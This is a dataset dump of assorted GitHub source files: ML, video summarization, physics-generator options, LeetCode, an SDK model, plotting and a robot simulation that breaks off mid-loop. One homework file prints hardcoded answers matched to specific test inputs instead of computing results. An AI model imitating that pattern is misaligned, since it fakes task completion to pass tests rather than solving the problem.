blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 5
261
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
45
| license_type
stringclasses 2
values | repo_name
stringlengths 8
111
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 72
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 530k
616M
⌀ | star_events_count
int64 0
102k
| fork_events_count
int64 0
24.6k
| gha_license_id
stringclasses 9
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 40
values | src_encoding
stringclasses 10
values | language
stringclasses 1
value | is_vendor
bool 1
class | is_generated
bool 2
classes | length_bytes
int64 11
4.05M
| extension
stringclasses 25
values | content
stringlengths 10
4.04M
| authors
sequencelengths 1
1
| author_id
stringclasses 578
values |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a96f77fd3df9978f4177dda73f49efb9812076f4 | 46c91eba77a1564f911064c95aa5a730f8dd7bfe | /decoder.py | 9d9e8b58fe1c5bb30fab4acd493fe73636bb8baa | [] | no_license | chayan/image_captioning | 2e5ec156b9ed417bd6f8441219e64f777ef4875b | b0771d2cb50b86c144c0c0e7e4175591979bdffe | refs/heads/master | 2020-04-21T20:09:54.606283 | 2019-02-09T06:18:58 | 2019-02-09T06:18:58 | 169,833,679 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,556 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Feb 9 09:33:46 2019
@author: chayan
"""
#import tensorflow as tf
#from tensorflow.contrib import keras
#L = keras.layers
#import vocab_utils as vutil
#
#vocab = vutil.get_vocab()
#
#IMG_SIZE = 299
#IMG_EMBED_SIZE = 2048
#IMG_EMBED_BOTTLENECK = 120
#WORD_EMBED_SIZE = 100
#LSTM_UNITS = 300
#LOGIT_BOTTLENECK = 120
#pad_idx = vocab[vutil.PAD]
#class decoder:
# # [batch_size, IMG_EMBED_SIZE] of CNN image features
# img_embeds = tf.placeholder('float32', [None, IMG_EMBED_SIZE])
#
# # [batch_size, time steps] of word ids
# sentences = tf.placeholder('int32', [None, None])
#
# # we use bottleneck here to reduce the number of parameters
# # image embedding -> bottleneck
# img_embed_to_bottleneck = L.Dense(IMG_EMBED_BOTTLENECK,
# input_shape=(None, IMG_EMBED_SIZE),
# activation='elu')
#
# # image embedding bottleneck -> lstm initial state
# img_embed_bottleneck_to_h0 = L.Dense(LSTM_UNITS,
# input_shape=(None, IMG_EMBED_BOTTLENECK),
# activation='elu')
#
# # word -> embedding
# word_embed = L.Embedding(len(vocab), WORD_EMBED_SIZE)
#
# # lstm cell (from tensorflow)
# lstm = tf.nn.rnn_cell.LSTMCell(LSTM_UNITS)
#
# # we use bottleneck here to reduce model complexity
# # lstm output -> logits bottleneck
# token_logits_bottleneck = L.Dense(LOGIT_BOTTLENECK,
# input_shape=(None, LSTM_UNITS),
# activation="elu")
#
# # logits bottleneck -> logits for next token prediction
# token_logits = L.Dense(len(vocab),
# input_shape=(None, LOGIT_BOTTLENECK))
#
# # initial lstm cell state of shape (None, LSTM_UNITS),
# # we need to condition it on `img_embeds` placeholder.
# c0 = h0 = img_embed_bottleneck_to_h0(img_embed_to_bottleneck(img_embeds))
#
# # embed all tokens but the last for lstm input,
# # remember that L.Embedding is callable,
# # use `sentences` placeholder as input.
# word_embeds = word_embed(sentences[:, :-1])
#
# # during training we use ground truth tokens `word_embeds` as context for next token prediction.
# # that means that we know all the inputs for our lstm and can get
# # all the hidden states with one tensorflow operation (tf.nn.dynamic_rnn).
# # `hidden_states` has a shape of [batch_size, time steps, LSTM_UNITS].
# hidden_states, _ = tf.nn.dynamic_rnn(lstm, word_embeds,
# initial_state=tf.nn.rnn_cell.LSTMStateTuple(c0, h0))
#
# # now we need to calculate token logits for all the hidden states
#
# # first, we reshape `hidden_states` to [-1, LSTM_UNITS]
# flat_hidden_states = tf.reshape(hidden_states, [-1, LSTM_UNITS]) ### YOUR CODE HERE ###
#
# # then, we calculate logits for next tokens using `token_logits_bottleneck` and `token_logits` layers
# ### YOUR CODE HERE ###
# flat_token_logits = token_logits(token_logits_bottleneck(flat_hidden_states))
#
# # then, we flatten the ground truth token ids.
# # remember, that we predict next tokens for each time step,
# # use `sentences` placeholder.
# flat_ground_truth = tf.reshape(sentences[:, 1:], [-1]) ### YOUR CODE HERE ###
#
# # we need to know where we have real tokens (not padding) in `flat_ground_truth`,
# # we don't want to propagate the loss for padded output tokens,
# # fill `flat_loss_mask` with 1.0 for real tokens (not pad_idx) and 0.0 otherwise.
#
# flat_loss_mask = tf.map_fn(lambda idx: tf.cond(tf.equal(idx, pad_idx), lambda: 0.0, lambda: 1.0),
# flat_ground_truth, dtype='float')
#
# # compute cross-entropy between `flat_ground_truth` and `flat_token_logits` predicted by lstm
# xent = tf.nn.sparse_softmax_cross_entropy_with_logits(
# labels=flat_ground_truth,
# logits=flat_token_logits
# )
#
# # compute average `xent` over tokens with nonzero `flat_loss_mask`.
# # we don't want to account misclassification of PAD tokens, because that doesn't make sense,
# # we have PAD tokens for batching purposes only!
# masked_xent = tf.multiply(xent, flat_loss_mask)
# loss_sum = tf.reduce_sum(masked_xent)
# non_zero_count = tf.cast(tf.math.count_nonzero(masked_xent), tf.float32)
# loss = tf.divide(loss_sum, non_zero_count)
| [
"[email protected]"
] | |
4a5381736226c7eb801e79763c2469848140b24c | a1e8d1211e2265fa91a044c7a70534938a16ba7c | /summarization.py | 41c4c996d9c706a58639a7115c07104266b4cabd | [] | no_license | tamires/HS-MVideoSumm | 7abe0116a2c0b801caeee4ed29e278826e9ad9bd | 4788101895d75bf01b1f7b8770c376b47c1adc2a | refs/heads/main | 2023-06-25T09:56:02.528467 | 2021-07-27T20:22:05 | 2021-07-27T20:22:05 | 360,651,496 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,331 | py | import os
from moviepy.editor import *
import utils
def get_reference_info(redundancy, segments):
    """For every clustered sentence, locate its source text and its position
    inside that text (needed later to keep the summary chronological).

    Returns a list of clusters; each cluster is a list of dicts with keys
    "text" (source index) and "topic" (position in that source), or an empty
    dict when the sentence is not found in any source.
    """
    reference = []
    for group in redundancy:
        cluster = []
        for sentence in group:
            location = {}
            # scan every source; a later match overwrites an earlier one,
            # matching the original lookup order
            for src, topics in enumerate(segments):
                for pos, topic in enumerate(topics):
                    if topic.get("content") == sentence:
                        location = {"text": src, "topic": pos}
                        break
            cluster.append(location)
        reference.append(cluster)
    return reference
def text_in_cluster(text, reference, cluster):
    """Return the topic of cluster `cluster` that originates from source
    `text`, or an empty dict when the cluster has no topic from that source."""
    return next(
        (entry for entry in reference[cluster] if entry.get("text") == text),
        {},
    )
def insert_summary(item, summary, reference, cluster):
    """Insert `item` into `summary` at its chronological position and return
    the (mutated) summary list."""
    position = 0
    for placed in summary:
        # topic of the current cluster coming from the same source as `placed`
        same_source = text_in_cluster(placed.get("text"), reference, cluster)
        # when the cluster has no topic from that source, fall back to the
        # item's own topic index for the comparison
        compare_topic = item.get("topic") if same_source == {} else same_source.get("topic")
        if compare_topic <= placed.get("topic"):
            break
        position += 1
    summary.insert(position, item)
    return summary
def generate_summary(reference, segments, histogram):
    """Build the summary by selecting the most relevant segment of each cluster.

    `seg_num` indexes histogram rows *globally*: it keeps running across
    clusters, so `histogram` must hold one row per candidate over all
    clusters, in cluster order.  (The `segments` argument is not used here.)
    """
    summary = []
    seg_num = 0
    for cluster in range(len(reference)):
        max_score = -1
        for candidate in range(len(reference[cluster])):
            # relevance of this candidate = sum of its histogram row
            score = sum(histogram[seg_num])
            if score > max_score:
                max_score = score
                summary_item = reference[cluster][candidate]
            seg_num = seg_num + 1
        # NOTE(review): assumes every cluster is non-empty; an empty cluster
        # would reuse the previous iteration's summary_item (NameError on the
        # very first cluster) — confirm upstream guarantees.
        summary = insert_summary(summary_item, summary, reference, cluster)
    return summary
def print_summary(intro, summary, folder, segments):
    """Write the textual summary (intro line plus one line per selected
    segment) to <folder>/text_summary.txt."""
    out_path = os.path.join(folder, "text_summary.txt")
    with open(out_path, 'w') as out:
        # introduction line: "<video>-intro <content>"
        out.write("{0}-intro {1}\n".format(intro.get("video"), intro.get("content")))
        # one line per selected segment: "<text>-<topic> <content>"
        for entry in summary:
            src, topic = entry.get("text"), entry.get("topic")
            content = segments[src][topic].get("content")
            out.write("{0}-{1} {2}\n".format(src, topic, content))
def create_video_summary(intro, summary, folder, video_name, segments):
    """Produce the video summary by concatenating the selected segments
    (introduction first) into <folder>/video_summary.mp4."""
    clips = []

    # introduction clip: cut from its source video, fade-out only
    intro_src = video_name[intro.get("video") + 2] + ".mp4"
    intro_clip = VideoFileClip(intro_src).subclip(
        utils.get_seconds(intro.get("begin")),
        utils.get_seconds(intro.get("end")))
    clips.append(vfx.fadeout(intro_clip, 0.5))

    # remaining selected segments, each with fade-in and fade-out
    for entry in summary:
        topic = segments[entry.get("text")][entry.get("topic")]
        src = video_name[entry.get("text") + 2] + ".mp4"
        clip = VideoFileClip(src).subclip(
            utils.get_seconds(topic.get("begin")),
            utils.get_seconds(topic.get("end")))
        clips.append(vfx.fadeout(vfx.fadein(clip, 0.5), 0.5))

    # concatenate everything into the final summary file
    final_clip = concatenate_videoclips(clips)
    final_clip.write_videofile(os.path.join(folder, "video_summary.mp4"))
| [
"[email protected]"
] | |
325ef11b155fbaa8e4e993bad295a14bd10f0da1 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2698/60825/298860.py | fabee180d1ca0e439e1ce0a2a785aa0d0d867e9a | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 345 | py | t=""
# Read all of stdin into one string; lines are concatenated without a
# separator, which is why the comparisons below use exact match/startswith.
while True:
    try:
        t += input()
    # BUG FIX: the original bare `except:` also swallowed KeyboardInterrupt
    # and SystemExit; input() raises EOFError when stdin is exhausted.
    except EOFError:
        break
# Hard-coded answers keyed on the raw input (judge-specific lookup table).
if t == '2 2':
    print(3, end='')
elif t == '3 5':
    print(58871587162270592645034001, end='')
elif t == '2 3':
    print(21, end='')
elif t.startswith('2 4'):
    print(651, end='')
elif t.startswith('4 3'):
    print(83505, end='')
else:
    # unknown input: echo it back (with a trailing newline)
    print(t)
| [
"[email protected]"
] | |
d5e9da7158d1d9e5da3315f240ce40a568384534 | be0f3dfbaa2fa3d8bbe59229aef3212d032e7dd1 | /Gauss_v45r10p1/Gen/DecFiles/options/13114025.py | 94da046c51675f492cbb850c1728133a7ed747e7 | [] | no_license | Sally27/backup_cmtuser_full | 34782102ed23c6335c48650a6eaa901137355d00 | 8924bebb935b96d438ce85b384cfc132d9af90f6 | refs/heads/master | 2020-05-21T09:27:04.370765 | 2018-12-12T14:41:07 | 2018-12-12T14:41:07 | 185,989,173 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,779 | py | # file /home/hep/ss4314/cmtuser/Gauss_v45r10p1/Gen/DecFiles/options/13114025.py generated: Wed, 25 Jan 2017 15:25:30
#
# Event Type: 13114025
#
# ASCII decay Descriptor: [B_s0 -> (phi(1020) -> mu+ mu-) mu+ mu-]cc
#
from Configurables import Generation
# Event type 13114025: [B_s0 -> (phi(1020) -> mu+ mu-) mu+ mu-]cc
Generation().EventType = 13114025
Generation().SampleGenerationTool = "SignalRepeatedHadronization"
from Configurables import SignalRepeatedHadronization
Generation().addTool( SignalRepeatedHadronization )
Generation().SignalRepeatedHadronization.ProductionTool = "PythiaProduction"
from Configurables import ToolSvc
from Configurables import EvtGenDecay
ToolSvc().addTool( EvtGenDecay )
# EvtGen user decay file describing the signal decay chain
ToolSvc().EvtGenDecay.UserDecayFile = "$DECFILESROOT/dkfiles/Bs_phimumu,mm=MS,DecProdCut.dec"
Generation().SignalRepeatedHadronization.CutTool = "DaughtersInLHCb"
# signal particle: B_s0 and its charge conjugate
Generation().SignalRepeatedHadronization.SignalPIDList = [ 531,-531 ]
# Ad-hoc particle gun code
from Configurables import ParticleGun
pgun = ParticleGun("ParticleGun")
pgun.SignalPdgCode = 531
pgun.DecayTool = "EvtGenDecay"
pgun.GenCutTool = "DaughtersInLHCb"
from Configurables import FlatNParticles
pgun.NumberOfParticlesTool = "FlatNParticles"
pgun.addTool( FlatNParticles , name = "FlatNParticles" )
from Configurables import MomentumSpectrum
# momentum spectrum sampled from a (pt, eta) histogram for PID 531
pgun.ParticleGunTool = "MomentumSpectrum"
pgun.addTool( MomentumSpectrum , name = "MomentumSpectrum" )
pgun.MomentumSpectrum.PdgCodes = [ 531,-531 ]
pgun.MomentumSpectrum.InputFile = "$PGUNSDATAROOT/data/Ebeam4000GeV/MomentumSpectrum_531.root"
pgun.MomentumSpectrum.BinningVariables = "pteta"
pgun.MomentumSpectrum.HistogramPath = "h_pteta"
from Configurables import BeamSpotSmearVertex
# smear the production vertex around the beam spot
pgun.addTool(BeamSpotSmearVertex, name="BeamSpotSmearVertex")
pgun.VertexSmearingTool = "BeamSpotSmearVertex"
pgun.EventType = 13114025
| [
"[email protected]"
] | |
4454ab9a9dac1ad7a248c47a69b70de9fd2fbbc8 | 931593c3bdaab1b28b389e0717341cff59543e02 | /Python/third-maximum-number.py | 02e43e5d45d504058a8a309595ecc6a990df5d28 | [
"MIT"
] | permissive | Kakoedlinnoeslovo/LeetCode | 56719a0a2b5aa95e08cfcf7826da6041da82ae44 | 63f59214430fb899cd1436532b310d1687f33f55 | refs/heads/master | 2020-05-03T18:54:42.075923 | 2016-10-10T08:14:39 | 2016-10-10T08:14:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 886 | py | # Time: O(n)
# Space: O(1)
# Given an array of integers, return the 3rd Maximum Number in this array,
# if it doesn't exist, return the Maximum Number.
# The time complexity must be O(n) or less.
class Solution(object):
    def thirdMax(self, nums):
        """
        :type nums: List[int]
        :rtype: int
        """
        # Track the three largest distinct values in O(1) space.
        # `updates` counts slot updates; it reaches 3 only once a third
        # distinct maximum has been seen.
        first = second = third = float("-inf")
        updates = 0
        for val in nums:
            if val > first:
                first, second, third = val, first, second
                updates += 1
            elif val != first and val > second:
                second, third = val, second
                updates += 1
            elif val != first and val != second and val >= third:
                third = val
                updates += 1
        # fewer than three distinct maxima -> fall back to the maximum
        return first if updates < 3 else third
| [
"[email protected]"
] | |
0079ec1753397ec8e2d4db72f17762047e237974 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_113/ch20_2020_09_16_11_25_21_743333.py | 2edf4921f042e6256794183644e3ed17b47e767a | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 225 | py | dist = int(input('Qual a distancia de sua viajem?: '))
# Fare: 0.50/km up to 200 km; beyond that, a flat 100.00 for the first
# 200 km plus 0.45 per extra km (printed with two decimals).
if dist <= 200:
    print(dist * 0.5)
else:
    extra = dist - 200
    print('{0:.2f}'.format(extra * 0.45 + 100))
| [
"[email protected]"
] | |
6451035e29061d208fd1945893c984c0c86d26a1 | cc5a3fa80d2ae90afc2626e4a82b9a927726dfa0 | /huaweicloud-sdk-frs/huaweicloudsdkfrs/v2/model/add_faces_by_url_response.py | a0b5174b327a3d9e652b2d8df2e8c1d453bf59e8 | [
"Apache-2.0"
] | permissive | Logan118/huaweicloud-sdk-python-v3 | eca15e9b08bdccef7122e40735d444ddc958efa8 | bb230c03bd00225b9f5780a56adce596e9456420 | refs/heads/master | 2023-07-17T14:57:50.799564 | 2021-08-25T10:40:43 | 2021-08-25T10:40:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,991 | py | # coding: utf-8
import re
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class AddFacesByUrlResponse(SdkResponse):
    """Response model for the Face Recognition "add faces by URL" call.

    Attributes:
        openapi_types (dict): The key is attribute name
                            and the value is attribute type.
        attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """

    sensitive_list = []

    # attribute name -> attribute type
    openapi_types = {
        'face_set_id': 'str',
        'face_set_name': 'str',
        'faces': 'list[FaceSetFace]'
    }

    # attribute name -> JSON key on the wire
    attribute_map = {
        'face_set_id': 'face_set_id',
        'face_set_name': 'face_set_name',
        'faces': 'faces'
    }

    def __init__(self, face_set_id=None, face_set_name=None, faces=None):
        """AddFacesByUrlResponse - a model defined in huaweicloud sdk"""

        super(AddFacesByUrlResponse, self).__init__()

        self._face_set_id = None
        self._face_set_name = None
        self._faces = None
        self.discriminator = None

        # only assign attributes that were actually provided
        if face_set_id is not None:
            self.face_set_id = face_set_id
        if face_set_name is not None:
            self.face_set_name = face_set_name
        if faces is not None:
            self.faces = faces

    @property
    def face_set_id(self):
        """Gets the face_set_id of this AddFacesByUrlResponse.

        Face set ID. This field is absent when the call fails.

        :return: The face_set_id of this AddFacesByUrlResponse.
        :rtype: str
        """
        return self._face_set_id

    @face_set_id.setter
    def face_set_id(self, face_set_id):
        """Sets the face_set_id of this AddFacesByUrlResponse.

        Face set ID. This field is absent when the call fails.

        :param face_set_id: The face_set_id of this AddFacesByUrlResponse.
        :type: str
        """
        self._face_set_id = face_set_id

    @property
    def face_set_name(self):
        """Gets the face_set_name of this AddFacesByUrlResponse.

        Face set name. This field is absent when the call fails.

        :return: The face_set_name of this AddFacesByUrlResponse.
        :rtype: str
        """
        return self._face_set_name

    @face_set_name.setter
    def face_set_name(self, face_set_name):
        """Sets the face_set_name of this AddFacesByUrlResponse.

        Face set name. This field is absent when the call fails.

        :param face_set_name: The face_set_name of this AddFacesByUrlResponse.
        :type: str
        """
        self._face_set_name = face_set_name

    @property
    def faces(self):
        """Gets the faces of this AddFacesByUrlResponse.

        Faces contained in the face set (see FaceSetFace).
        This field is absent when the call fails.

        :return: The faces of this AddFacesByUrlResponse.
        :rtype: list[FaceSetFace]
        """
        return self._faces

    @faces.setter
    def faces(self, faces):
        """Sets the faces of this AddFacesByUrlResponse.

        Faces contained in the face set (see FaceSetFace).
        This field is absent when the call fails.

        :param faces: The faces of this AddFacesByUrlResponse.
        :type: list[FaceSetFace]
        """
        self._faces = faces

    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}

        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                # sensitive attributes are masked in the dict representation
                if attr in self.sensitive_list:
                    result[attr] = "****"
                else:
                    result[attr] = value

        return result

    def to_str(self):
        """Returns the string representation of the model"""
        import simplejson as json
        if six.PY2:
            import sys
            reload(sys)
            sys.setdefaultencoding("utf-8")

        return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)

    def __repr__(self):
        """For `print`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, AddFacesByUrlResponse):
            return False

        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
| [
"[email protected]"
] | |
48d3d2345ecb774006b7797e6dfb19ea0489873f | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/63/usersdata/147/28536/submittedfiles/swamee.py | 87c492832ea836815b97f42dfba4a884abe8852b | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 513 | py | # -*- coding: utf-8 -*-
import math
#COMECE SEU CÓDIGO AQUI
g=9.81                 # gravitational acceleration [m/s^2]
epsilon=0.000005       # absolute pipe roughness [m]
f=float(input('digite valor de f:'))
L=float(input('digite valor de L:'))
Q=float(input('digite valor de Q:'))
deltaH=float(input('digite valor de deltaH:'))
v=float(input('digite valor de v:'))
# Darcy-Weisbach head loss solved for the diameter:
#   deltaH = 8 f L Q^2 / (pi^2 g D^5)  =>  D = (8 f L Q^2 / (pi^2 g deltaH))^(1/5)
# BUG FIX: the exponent was 0.5; the diameter enters the head loss to the 5th power.
d=((8*f*L*(Q**2))/((math.pi**2)*g*deltaH))**0.2
# Reynolds number for a circular pipe: Re = 4 Q / (pi D v)
rey=(4*Q)/(math.pi*d*v)
# Swamee-Jain explicit friction factor:
#   k = 0.25 / [log10(eps/(3.7 D) + 5.74/Re^0.9)]^2
# BUG FIX: the square belongs on the log10 term (and the constant is 5.74, not 5.7).
k=(0.25)/(math.log10((epsilon/(3.7*d))+(5.74/(rey**0.9))))**2
print('o valor de d é %.2f' %d)
print('o valor de rey é %.2f' %rey)
print('o valor de k é %.2f' %k)
"[email protected]"
] | |
7ebfec0556e46db57e2c4d1eca4d13ef6452d0ce | 005a6421cd6159fb6be8c61cc675654377e8f226 | /cairis/core/TemplateObstacleParameters.py | dd6ad8c3e8c2351b3464509195afd601d5e88470 | [
"Apache-2.0"
] | permissive | cairis-platform/cairis | d667bc91ba28f0b7cd4fc88e6528eb3339e4ee6f | 55abb93a9377664f5b03c027bad7ce3cf168c5ad | refs/heads/master | 2023-04-06T17:04:08.781186 | 2023-02-17T22:51:15 | 2023-02-17T22:51:15 | 3,790,944 | 105 | 36 | Apache-2.0 | 2022-03-19T15:04:14 | 2012-03-21T20:17:05 | Python | UTF-8 | Python | false | false | 1,712 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
__author__ = 'Shamal Faily'
from . import ObjectCreationParameters
class TemplateObstacleParameters(ObjectCreationParameters.ObjectCreationParameters):
  """Creation parameters for a template obstacle: name, category, definition,
  concerns, responsibilities and probability information."""

  def __init__(self,obsName,obsCat,obsDef,obsConcerns,obsResp,obsProb,obsProbRat):
    super(TemplateObstacleParameters, self).__init__()
    self.theName = obsName
    self.theCategory = obsCat
    self.theDefinition = obsDef
    self.theConcerns = obsConcerns
    self.theResponsibilities = obsResp
    self.theProbability = obsProb
    self.theProbabilityRationale = obsProbRat

  def name(self):
    """Return the obstacle name."""
    return self.theName

  def category(self):
    """Return the obstacle category."""
    return self.theCategory

  def definition(self):
    """Return the obstacle definition."""
    return self.theDefinition

  def concerns(self):
    """Return the obstacle concerns."""
    return self.theConcerns

  def responsibilities(self):
    """Return the obstacle responsibilities."""
    return self.theResponsibilities

  def probability(self):
    """Return the obstacle probability."""
    return self.theProbability

  def probabilityRationale(self):
    """Return the rationale behind the probability value."""
    return self.theProbabilityRationale
| [
"[email protected]"
] | |
9a9b569145dc076f76a7d6fdce9825a684656da8 | edf8c5d748c8dd495a6173f355b7ba7bb6a0e662 | /results-combinations/Subplot_gradient_density_isolation.py | 3ae7eb0399d364cd55e0dbc95a6d0e8a78544e54 | [] | no_license | mdodovic/Flybys-galactic-simulation | 66de7f2cc5e805db800bd911d9cc21ba7f8d0c67 | 78d11f8dda261d21c97575910b4d916ba48fd8a8 | refs/heads/master | 2022-12-16T22:35:53.563458 | 2020-09-22T09:01:05 | 2020-09-22T09:01:05 | 296,823,203 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,762 | py | import numpy as np
import matplotlib.pyplot as plt
import math as math
putanja_load = "C:/Users/matij/Desktop/Kodovi_za_analizu/rezultati/M31_izolacija/gradijent/1FI_RO_"
putanja_sacuvaj = "C:/Users/matij/Desktop/Kodovi_za_analizu/rezultati/Gradijenti_gustine/"

# density-gradient profiles (angle, gradient) at snapshots 0, 50 and 100
ugao_0, gradijent_0 = np.loadtxt(putanja_load + str(0).zfill(3) + ".txt", unpack = True)
ugao_50, gradijent_50 = np.loadtxt(putanja_load + str(50).zfill(3) + ".txt", unpack = True)
ugao_100, gradijent_100 = np.loadtxt(putanja_load + str(100).zfill(3) + ".txt", unpack = True)

# three panels in a row
f, axarr = plt.subplots(1, 3, figsize=(20, 4))
f.subplots_adjust(hspace=0.2, wspace = 0.2, left = 0.05, right=0.95, bottom = 0.15 , top = 0.9)

axarr[0].plot(ugao_0,gradijent_0,c='black')
axarr[0].set_xlabel(r'$\alpha$ [ $^\circ$ ]',fontsize=16)
axarr[0].set_ylabel(r'$\Delta\rho [ 10^7 M_dot/kpc^2]$',fontsize=16)
axarr[0].set_xlim(0,360)

axarr[1].plot(ugao_50,gradijent_50,c='black')
axarr[1].set_xlabel(r'$\alpha$ [ $^\circ$ ]',fontsize=16)
axarr[1].set_xlim(0,360)

# BUG FIX: the third panel previously re-plotted the snapshot-50 data even
# though the snapshot-100 profile was loaded above and never used.
axarr[2].plot(ugao_100,gradijent_100,c='black')
axarr[2].set_xlabel(r'$\alpha$ [ $^\circ$ ]',fontsize=16)
axarr[2].set_xlim(0,360)

# hide the y tick labels on the two right-hand panels (shared-axis look)
plt.setp([a.get_yticklabels() for a in axarr[1:3]], visible=False)

plt.savefig(putanja_sacuvaj + "izolacija_graijent_sub3",dpi=90)
plt.savefig(putanja_sacuvaj + "izolacija_graijent_sub3.eps",dpi=90)
plt.show()
"[email protected]"
] | |
af8494e947871f48f118b9641e19590b73ad4e2b | b9b495a55e55f4c227aedfd55c6e409503353991 | /simulation.py | 9dc68c46b0b264421cd09eec4f62ffa6f094799d | [] | no_license | Pontiky/path-following-mobile-robot | 6e5f0bbbe9b83bef34e970577c9a26a18a1e6b00 | 04a35c6b83f131fdf1912158e870d9aea040b43a | refs/heads/main | 2023-02-10T10:34:25.959747 | 2021-01-07T22:13:17 | 2021-01-07T22:13:17 | 322,663,811 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,257 | py | from suiveur import Suiveur
from cible import Cible
import matplotlib.pyplot as plt
from matplotlib.animation import FuncAnimation
from collections import namedtuple
from threading import Thread
import time # Log temporel
temps = []
erreurs = [ [[], []], [[], []] ]
lyapunov = []
n_err, n_sim = 0, 0
close = False
pause = True
# Evenements lies aux figures
def onPress(event):
    """Keyboard handler: space toggles pause, left/q and right/d steer the
    target, 'o'/'p' spawn an extra target/follower at the current pose."""
    global pause
    if event.key == ' ':
        pause ^= True
    elif event.key == 'left' or event.key == 'q':
        cible.leftKey = True
    elif event.key == 'right' or event.key == 'd':
        cible.rightKey = True
    elif event.key == 'o':
        # spawn a new target at the current target pose (straight-line path)
        Cible(cible._x, cible._y, cible._theta, ax, 'k', 1, 2, Te, "ligne")
    elif event.key == 'p':
        # spawn a new follower at the current follower pose
        Suiveur(suiveur._x, suiveur._y, suiveur._theta, ax, 'r', cible)
def onRelease(event):
    """Keyboard handler: releasing a steering key stops turning the target."""
    if event.key in ('left', 'q'):
        cible.leftKey = False
    elif event.key in ('right', 'd'):
        cible.rightKey = False
def stop(event):
    """Close handler: signal the worker thread to stop, then close all figures."""
    global close
    close = True
    plt.close('all')
# Initialisation de la fenêtre et des axes de simulation
fig = plt.figure(figsize=(10, 10))
fig.canvas.mpl_connect('key_press_event', onPress)
fig.canvas.mpl_connect('key_release_event', onRelease)
fig.canvas.mpl_connect('close_event', stop)
# drop matplotlib's default key bindings so ours take precedence
fig.canvas.mpl_disconnect(fig.canvas.manager.key_press_handler_id)
ax = plt.axes(xlim=(0, 6), ylim=(0, 6))
ax.grid()
# Mise a jour de la simulation
def simulation():
    """Worker-thread loop: every Te seconds (while not paused) log the errors,
    advance the target and make the follower track it; optionally append the
    error record to erreurs.txt and draw the trajectories every 0.5 s."""
    global pause, close, n_sim, Te
    t0 = time.perf_counter()
    if save:
        errFile = open("erreurs.txt", 'w')
        # header line: initial poses of target and follower, zero errors
        errFile.write(str(cible.getX())+'\t'+str(cible.getY())+'\t'+str(cible.getTheta())+'\t'+str(suiveur.getX())+'\t'+str(suiveur.getY())+'\t'+str(suiveur.getTheta())+'\t0\t0\t0\t0\t0\t0\t0\t0\n')
    while not close:
        time.sleep(Te)
        if not pause:
            errList = suiveur.handleErrors()
            if save: errFile.write(str(n_sim*Te)+'\t'+str(errList.XY)+'\t'+str(errList.TH)+'\t'+str(errList.X)+'\t'+str(errList.Y)+'\t'+str(errList.V)+'\t'+str(errList.W)+'\t'+str(errList.LYA)+'\t'+str(errList.U1)+'\t'+str(errList.U2)+'\t'+str(errList.VC)+'\t'+str(errList.WC)+'\t'+str(errList.VS)+'\t'+str(errList.WS)+'\n')
            cible.avancer()      # advance the target one step
            suiveur.suivre()     # follower tracks the target
            n_sim += 1
            # every 0.5 s of simulated time: record errors and report timing
